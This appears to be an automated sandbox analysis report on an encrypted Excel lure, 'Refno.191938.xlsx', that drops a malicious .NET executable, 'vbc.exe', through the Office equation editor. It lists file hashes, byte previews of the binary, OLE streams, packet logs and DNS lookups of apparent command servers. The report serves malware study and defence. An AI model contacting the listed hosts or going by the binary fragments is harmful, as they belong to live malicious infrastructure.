.WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FGWHD4SVKSW8FSD4W3RI.temp
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 8016
Entropy (8bit): 3.579570991262064
Encrypted: false
SSDEEP: 96:chQCsMqdqvsqvJCwoEz8hQCsMqdqvsEHyqvJCwor6zg1KrUHTZqO1lUVuIu:cyUoEz8yAHnor6zgUAZqOTIu
MD5: FF71E5285457125B1C244AF15F69FE52
SHA1: 05462AF421A836630E0FE28FF18C114D1E853D1E
SHA-256: DDA708ECD50125033B0B20D633E2C74F56541AB82CC0782D26F6CF15E96CDF48
SHA-512: 52A7A679DBD31C69B2CA9FAF6102651013CD9AB27957A6A452632FD7B90800B80B603BA1902AFAD3F90C31C0BA9569F559CEEA84C2A72023DF0D31174EBA97C8
Malicious: false
                                            Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VS5R8C47SQIP1WVHNPQO.temp
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):8016
                                            Entropy (8bit):3.579570991262064
                                            Encrypted:false
                                            SSDEEP:96:chQCsMqdqvsqvJCwoEz8hQCsMqdqvsEHyqvJCwor6zg1KrUHTZqO1lUVuIu:cyUoEz8yAHnor6zgUAZqOTIu
                                            MD5:FF71E5285457125B1C244AF15F69FE52
                                            SHA1:05462AF421A836630E0FE28FF18C114D1E853D1E
                                            SHA-256:DDA708ECD50125033B0B20D633E2C74F56541AB82CC0782D26F6CF15E96CDF48
                                            SHA-512:52A7A679DBD31C69B2CA9FAF6102651013CD9AB27957A6A452632FD7B90800B80B603BA1902AFAD3F90C31C0BA9569F559CEEA84C2A72023DF0D31174EBA97C8
                                            Malicious:false
                                            Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                            C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe
                                            Process:C:\Users\Public\vbc.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):734720
                                            Entropy (8bit):7.525234190780704
                                            Encrypted:false
                                            SSDEEP:12288:OxIvnbBjqfKMpnc2FOAeqL6oPUxMnHIqKG6BcmKd4pC+sO6cHksc5w3sLj19nFY:OVHUxCHIqKG6Bw5yTc5yo19nF
                                            MD5:BA01DF16E4C876E078348FD4479A8FDF
                                            SHA1:6C7F20976D3E7D9BF9F8A410CBC54962D1EF52BB
                                            SHA-256:8353E30C6566795DA3E5AA38A22B4707EE895CFA115FFA399CFBE7D57D00F91D
                                            SHA-512:7D828277F9DFD39755B015CB25EE713159C2CF9D812EA938B408E0C21B9004B72D9EFA21DEF95DFA307838DB56558FD8E507AD10B887E1ED7CA1219A53E8747C
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.2...............P......L........... ... ....@.. ....................................@.....................................O.... ..,H..........................h................................................ ............... ..H............text........ ...................... ..`.rsrc...,H... ...J..................@..@.reloc...............4..............@..B........................H.......................P................................................0............(....(..........(.....o.....*.....................( ......(!......("......(#......($....*N..(....oU...(%....*&..(&....*.s'........s(........s)........s*........s+........*....0...........~....o,....+..*.0...........~....o-....+..*.0...........~....o.....+..*.0...........~....o/....+..*.0...........~....o0....+..*&..(1....*...0..<........~.....(2.....,!r...p.....(3...o4...s5............~.....
                                            C:\Users\user\Desktop\~$Refno.191938.xlsx
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):330
                                            Entropy (8bit):1.4377382811115937
                                            Encrypted:false
                                            SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                            MD5:96114D75E30EBD26B572C1FC83D1D02E
                                            SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                            SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                            SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                            Malicious:true
                                            Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            C:\Users\Public\vbc.exe
                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):734720
                                            Entropy (8bit):7.525234190780704
                                            Encrypted:false
                                            SSDEEP:12288:OxIvnbBjqfKMpnc2FOAeqL6oPUxMnHIqKG6BcmKd4pC+sO6cHksc5w3sLj19nFY:OVHUxCHIqKG6Bw5yTc5yo19nF
                                            MD5:BA01DF16E4C876E078348FD4479A8FDF
                                            SHA1:6C7F20976D3E7D9BF9F8A410CBC54962D1EF52BB
                                            SHA-256:8353E30C6566795DA3E5AA38A22B4707EE895CFA115FFA399CFBE7D57D00F91D
                                            SHA-512:7D828277F9DFD39755B015CB25EE713159C2CF9D812EA938B408E0C21B9004B72D9EFA21DEF95DFA307838DB56558FD8E507AD10B887E1ED7CA1219A53E8747C
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.2...............P......L........... ... ....@.. ....................................@.....................................O.... ..,H..........................h................................................ ............... ..H............text........ ...................... ..`.rsrc...,H... ...J..................@..@.reloc...............4..............@..B........................H.......................P................................................0............(....(..........(.....o.....*.....................( ......(!......("......(#......($....*N..(....oU...(%....*&..(&....*.s'........s(........s)........s*........s+........*....0...........~....o,....+..*.0...........~....o-....+..*.0...........~....o.....+..*.0...........~....o/....+..*.0...........~....o0....+..*&..(1....*...0..<........~.....(2.....,!r...p.....(3...o4...s5............~.....

                                            Static File Info

                                            General

                                            File type:CDFV2 Encrypted
                                            Entropy (8bit):7.984133724091837
                                            TrID:
                                            • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                            File name:Refno.191938.xlsx
                                            File size:326656
                                            MD5:a6ea0794f2791f9f2bdfcdb467122e6b
                                            SHA1:83815a1977485c3fabdd49c91926d0482e3b78e1
                                            SHA256:db692f9512b08149089a9d7295a04633f22944d87f2bfe53ae00d2c55f7502ca
                                            SHA512:8e9d56848c8e9dc03676348ebc0b57b650cfe4a8c61d1d8825b68e7989f29eb83509e9a1d5d35fcdf9e81e1ddcd8ed6a80d7a947e5906965f9d42f89f7d6fc6d
                                            SSDEEP:6144:Nc2M/OhbVZxxJBrH0z4IeLiR2sWxIyEazPO8ZH88w5a5GCvVWoiNa6LwnxTaM4sL:6PAVhJd07eLgiK0PO8588wDCh+aPxWcL
                                            File Content Preview:........................>.......................................................................|..............................................................................................................................................................

                                            File Icon

                                            Icon Hash:e4e2aa8aa4b4bcb4

                                            Static OLE Info

                                            General

                                            Document Type:OLE
                                            Number of OLE Files:1

                                            OLE File "Refno.191938.xlsx"

                                            Indicators

                                            Has Summary Info:False
                                            Application Name:unknown
                                            Encrypted Document:True
                                            Contains Word Document Stream:False
                                            Contains Workbook/Book Stream:False
                                            Contains PowerPoint Document Stream:False
                                            Contains Visio Document Stream:False
                                            Contains ObjectPool Stream:
                                            Flash Objects Count:
                                            Contains VBA Macros:False

                                            Streams

                                            Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                            General
                                            Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                            File Type:data
                                            Stream Size:64
                                            Entropy:2.73637206947
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                            Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                            Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                            General
                                            Stream Path:\x6DataSpaces/DataSpaceMap
                                            File Type:data
                                            Stream Size:112
                                            Entropy:2.7597816111
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                            Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                            Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                            General
                                            Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                            File Type:data
                                            Stream Size:200
                                            Entropy:3.13335930328
                                            Base64 Encoded:False
                                            Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                            Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                            General
                                            Stream Path:\x6DataSpaces/Version
                                            File Type:data
                                            Stream Size:76
                                            Entropy:2.79079600998
                                            Base64 Encoded:False
                                            Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                            Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                            Stream Path: EncryptedPackage, File Type: data, Stream Size: 319688
                                            General
                                            Stream Path:EncryptedPackage
                                            File Type:data
                                            Stream Size:319688
                                            Entropy:7.99921088827
                                            Base64 Encoded:True
                                            Data ASCII:. . . . . . . . . % . . . . 9 . . . ^ . F s P . . . . . " . . . . . . . . . . . 3 . . . . . . i _ . R . h . . . . . . . . . . . . . S . . . . . . y w a . q . M . . d . u f h . . y w a . q . M . . d . u f h . . y w a . q . M . . d . u f h . . y w a . q . M . . d . u f h . . y w a . q . M . . d . u f h . . y w a . q . M . . d . u f h . . y w a . q . M . . d . u f h . . y w a . q . M . . d . u f h . . y w a . q . M . . d . u f h . . y w a . q . M . . d . u f h . . y w a . q . M . . d . u f h . . y w a . q . M
                                            Data Raw:c0 e0 04 00 00 00 00 00 e0 25 84 bd f8 ac 39 ae d3 95 5e c0 46 73 50 1b e1 ad f1 e4 22 e7 0d 83 b4 99 cf a6 e7 82 19 fb 33 cf b4 b5 1a 03 9c 69 5f 9e 52 00 68 f9 9b ae e5 df f4 ae aa 0d 85 b5 ed 13 53 ef 05 0e 99 ed b9 79 77 61 82 71 fb 4d d2 b3 64 05 75 66 68 dc b9 79 77 61 82 71 fb 4d d2 b3 64 05 75 66 68 dc b9 79 77 61 82 71 fb 4d d2 b3 64 05 75 66 68 dc b9 79 77 61 82 71 fb 4d
                                            Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                            General
                                            Stream Path:EncryptionInfo
                                            File Type:data
                                            Stream Size:224
                                            Entropy:4.59742097095
                                            Base64 Encoded:False
                                            Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . 3 . I . G . . . * . . . . . . . . . . . . . . . 9 . L . & . . . . . . . . . . . ! . . 0 . . . ) . . = . . . . . . . . . . . . 2 _ .
                                            Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                            Network Behavior

                                            Snort IDS Alerts

                                            Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                            05/04/21-16:40:51.173911 | TCP | 3132 | WEB-CLIENT PNG large image width download attempt | 80 | 49165 | 198.23.213.57 | 192.168.2.22

                                            Network Port Distribution

                                            TCP Packets

                                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                            May 4, 2021 16:40:50.081424952 CEST | 49165 | 80 | 192.168.2.22 | 198.23.213.57
                                            May 4, 2021 16:40:50.219065905 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.219173908 CEST | 49165 | 80 | 192.168.2.22 | 198.23.213.57
                                            May 4, 2021 16:40:50.219563007 CEST | 49165 | 80 | 192.168.2.22 | 198.23.213.57
                                            May 4, 2021 16:40:50.357841015 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.357873917 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.357889891 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.357908964 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.357918024 CEST | 49165 | 80 | 192.168.2.22 | 198.23.213.57
                                            May 4, 2021 16:40:50.357948065 CEST | 49165 | 80 | 192.168.2.22 | 198.23.213.57
                                            May 4, 2021 16:40:50.357950926 CEST | 49165 | 80 | 192.168.2.22 | 198.23.213.57
                                            May 4, 2021 16:40:50.493119001 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.493146896 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.493159056 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.493175030 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.493191004 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.493207932 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.493223906 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.493240118 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.493294001 CEST | 49165 | 80 | 192.168.2.22 | 198.23.213.57
                                            May 4, 2021 16:40:50.497241974 CEST | 49165 | 80 | 192.168.2.22 | 198.23.213.57
                                            May 4, 2021 16:40:50.629834890 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.629865885 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.629878044 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.629893064 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.629914045 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.629931927 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.629946947 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.629964113 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.630022049 CEST | 49165 | 80 | 192.168.2.22 | 198.23.213.57
                                            May 4, 2021 16:40:50.630038023 CEST | 49165 | 80 | 192.168.2.22 | 198.23.213.57
                                            May 4, 2021 16:40:50.634799957 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.634826899 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.634848118 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.634864092 CEST | 49165 | 80 | 192.168.2.22 | 198.23.213.57
                                            May 4, 2021 16:40:50.634870052 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.634876013 CEST | 49165 | 80 | 192.168.2.22 | 198.23.213.57
                                            May 4, 2021 16:40:50.634888887 CEST | 49165 | 80 | 192.168.2.22 | 198.23.213.57
                                            May 4, 2021 16:40:50.634895086 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.634902954 CEST | 49165 | 80 | 192.168.2.22 | 198.23.213.57
                                            May 4, 2021 16:40:50.634917974 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.634931087 CEST | 49165 | 80 | 192.168.2.22 | 198.23.213.57
                                            May 4, 2021 16:40:50.634941101 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.634952068 CEST | 49165 | 80 | 192.168.2.22 | 198.23.213.57
                                            May 4, 2021 16:40:50.634964943 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.634974957 CEST | 49165 | 80 | 192.168.2.22 | 198.23.213.57
                                            May 4, 2021 16:40:50.634999990 CEST | 49165 | 80 | 192.168.2.22 | 198.23.213.57
                                            May 4, 2021 16:40:50.635679960 CEST | 49165 | 80 | 192.168.2.22 | 198.23.213.57
                                            May 4, 2021 16:40:50.765265942 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.765302896 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.765320063 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.765336037 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.765356064 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.765376091 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.765419006 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.765444994 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.765458107 CEST | 49165 | 80 | 192.168.2.22 | 198.23.213.57
                                            May 4, 2021 16:40:50.765466928 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.765480042 CEST | 49165 | 80 | 192.168.2.22 | 198.23.213.57
                                            May 4, 2021 16:40:50.765482903 CEST | 49165 | 80 | 192.168.2.22 | 198.23.213.57
                                            May 4, 2021 16:40:50.765485048 CEST | 49165 | 80 | 192.168.2.22 | 198.23.213.57
                                            May 4, 2021 16:40:50.765489101 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.765505075 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.765523911 CEST | 49165 | 80 | 192.168.2.22 | 198.23.213.57
                                            May 4, 2021 16:40:50.765527964 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.765542984 CEST | 49165 | 80 | 192.168.2.22 | 198.23.213.57
                                            May 4, 2021 16:40:50.765548944 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.765563965 CEST | 49165 | 80 | 192.168.2.22 | 198.23.213.57
                                            May 4, 2021 16:40:50.765568018 CEST | 49165 | 80 | 192.168.2.22 | 198.23.213.57
                                            May 4, 2021 16:40:50.765571117 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.765590906 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.765599966 CEST | 49165 | 80 | 192.168.2.22 | 198.23.213.57
                                            May 4, 2021 16:40:50.765615940 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.765619993 CEST | 49165 | 80 | 192.168.2.22 | 198.23.213.57
                                            May 4, 2021 16:40:50.765625000 CEST | 49165 | 80 | 192.168.2.22 | 198.23.213.57
                                            May 4, 2021 16:40:50.765650988 CEST | 49165 | 80 | 192.168.2.22 | 198.23.213.57
                                            May 4, 2021 16:40:50.768045902 CEST | 49165 | 80 | 192.168.2.22 | 198.23.213.57
                                            May 4, 2021 16:40:50.770067930 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.770104885 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.770136118 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.770162106 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.770175934 CEST | 49165 | 80 | 192.168.2.22 | 198.23.213.57
                                            May 4, 2021 16:40:50.770188093 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.770195007 CEST | 49165 | 80 | 192.168.2.22 | 198.23.213.57
                                            May 4, 2021 16:40:50.770198107 CEST | 49165 | 80 | 192.168.2.22 | 198.23.213.57
                                            May 4, 2021 16:40:50.770215988 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.770229101 CEST | 49165 | 80 | 192.168.2.22 | 198.23.213.57
                                            May 4, 2021 16:40:50.770245075 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.770256996 CEST | 49165 | 80 | 192.168.2.22 | 198.23.213.57
                                            May 4, 2021 16:40:50.770272970 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.770291090 CEST | 49165 | 80 | 192.168.2.22 | 198.23.213.57
                                            May 4, 2021 16:40:50.770299911 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.770315886 CEST | 49165 | 80 | 192.168.2.22 | 198.23.213.57
                                            May 4, 2021 16:40:50.770333052 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.770345926 CEST | 49165 | 80 | 192.168.2.22 | 198.23.213.57
                                            May 4, 2021 16:40:50.770361900 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.770378113 CEST | 49165 | 80 | 192.168.2.22 | 198.23.213.57
                                            May 4, 2021 16:40:50.770389080 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22
                                            May 4, 2021 16:40:50.770405054 CEST | 49165 | 80 | 192.168.2.22 | 198.23.213.57
                                            May 4, 2021 16:40:50.770415068 CEST | 80 | 49165 | 198.23.213.57 | 192.168.2.22

                                            UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 4, 2021 16:41:55.059818983 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8
May 4, 2021 16:41:55.130595922 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22
May 4, 2021 16:42:14.700201035 CEST | 53099 | 53 | 192.168.2.22 | 8.8.8.8
May 4, 2021 16:42:14.779922009 CEST | 53 | 53099 | 8.8.8.8 | 192.168.2.22
May 4, 2021 16:42:34.995629072 CEST | 52838 | 53 | 192.168.2.22 | 8.8.8.8
May 4, 2021 16:42:35.070686102 CEST | 53 | 52838 | 8.8.8.8 | 192.168.2.22

                                            DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
May 4, 2021 16:41:55.059818983 CEST | 192.168.2.22 | 8.8.8.8 | 0xa14d | Standard query (0) | www.20svip.com | A (IP address) | IN (0x0001)
May 4, 2021 16:42:14.700201035 CEST | 192.168.2.22 | 8.8.8.8 | 0xccff | Standard query (0) | www.pistonpounder.com | A (IP address) | IN (0x0001)
May 4, 2021 16:42:34.995629072 CEST | 192.168.2.22 | 8.8.8.8 | 0x2e78 | Standard query (0) | www.streamxvid.com | A (IP address) | IN (0x0001)

                                            DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
May 4, 2021 16:41:55.130595922 CEST | 8.8.8.8 | 192.168.2.22 | 0xa14d | No error (0) | www.20svip.com | 20svip.com | - | CNAME (Canonical name) | IN (0x0001)
May 4, 2021 16:41:55.130595922 CEST | 8.8.8.8 | 192.168.2.22 | 0xa14d | No error (0) | 20svip.com | - | 43.226.23.112 | A (IP address) | IN (0x0001)
May 4, 2021 16:42:14.779922009 CEST | 8.8.8.8 | 192.168.2.22 | 0xccff | Name error (3) | www.pistonpounder.com | none | none | A (IP address) | IN (0x0001)
May 4, 2021 16:42:35.070686102 CEST | 8.8.8.8 | 192.168.2.22 | 0x2e78 | No error (0) | www.streamxvid.com | - | 178.33.233.22 | A (IP address) | IN (0x0001)

                                            HTTP Request Dependency Graph

                                            • 198.23.213.57
                                            • www.20svip.com

                                            HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
